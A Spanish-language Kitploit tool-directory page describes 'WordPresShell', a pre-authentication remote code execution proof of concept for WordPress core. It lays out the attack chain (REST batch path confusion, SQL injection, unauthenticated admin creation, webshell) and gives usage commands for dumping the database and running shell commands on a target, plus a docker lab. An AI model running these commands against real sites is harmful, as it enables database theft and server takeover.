Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
WordPresShell — PoC de RCE de pre-autenticación para CVE-2026-63030 / CVE-2026-60137 (núcleo de WordPress) | Kitploit
Herramientas/GitHubGitHub/securelayer7/wordpresshell
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubsecurelayer7/wordpresshell

WordPresShell

PoC de RCE de pre-autenticación para CVE-2026-63030 / CVE-2026-60137 (núcleo de WordPress)

Ver Repositorio
91hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

WordPresShell

PoC de RCE pre-autenticación para CVE-2026-63030 + CVE-2026-60137 (núcleo de WordPress). Confusión de ruta REST /batch/v1 → SQLi WP_Query author__not_in → creación de administrador no autenticado → webshell. Archivo único, solo stdlib de Python.

Vulnerabilidad: Adam Kues (Searchlight Cyber). Afectadas: 6.9.0–6.9.4, 7.0.0–7.0.1. Corregidas: 6.9.5 / 7.0.2.

Uso

root@kitploit:~
python3 WordPresShell.py check http://target                      # confirm (non-destructive)
python3 WordPresShell.py dump  http://target [--query "SELECT @@version"]
python3 WordPresShell.py shell http://target --cmd "id"           # crack-free RCE
python3 WordPresShell.py shell http://target -i                   # interactive
python3 WordPresShell.py shell http://target --user U --password P --cmd id

Laboratorio

root@kitploit:~
docker compose up -d          # WordPress 7.0.1 on :8092
docker compose down -v        # teardown

shell crea un administrador y deja una webshell — elimina ambos después de las pruebas. Solo pruebas autorizadas.

Descargar herramienta